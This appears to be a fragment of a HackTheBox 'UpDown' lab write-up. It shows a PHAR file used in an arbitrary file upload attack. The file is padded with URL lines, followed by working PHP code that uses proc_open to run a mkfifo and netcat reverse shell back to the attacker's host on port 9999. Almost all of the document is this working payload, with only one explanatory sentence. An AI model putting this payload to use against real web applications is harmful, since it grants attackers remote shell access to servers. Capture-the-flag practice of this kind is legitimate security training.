UpDown_Payload

PHP Reverse Shell

---

┌──(kali㉿kali)-[~/archive/htb/labs/updown]
└─$ cat proc_open_shell.phar
http://10.10.16.8/qweqweqwe
http://10.10.16.8/qweqweqwe
http://10.10.16.8/qweqweqwe
http://10.10.16.8/qweqweqwe
http://10.10.16.8/qweqweqwe
http://10.10.16.8/qweqweqwe
http://10.10.16.8/qweqweqwe
http://10.10.16.8/qweqweqwe
http://10.10.16.8/qweqweqwe
<?php
$process = proc_open(
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.8 9999 >/tmp/f",
    array(
        0 => array('pipe', 'r'),
        1 => array('pipe', 'w'),
        2 => array('pipe', 'w')
    ),
    $pipes
);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

PHAR payload for the arbitrary file upload exploitation; proc_open_shell.phar a reverse shell is made through system commands invoked only via the php proc_open function to match the PHP environment within the target web application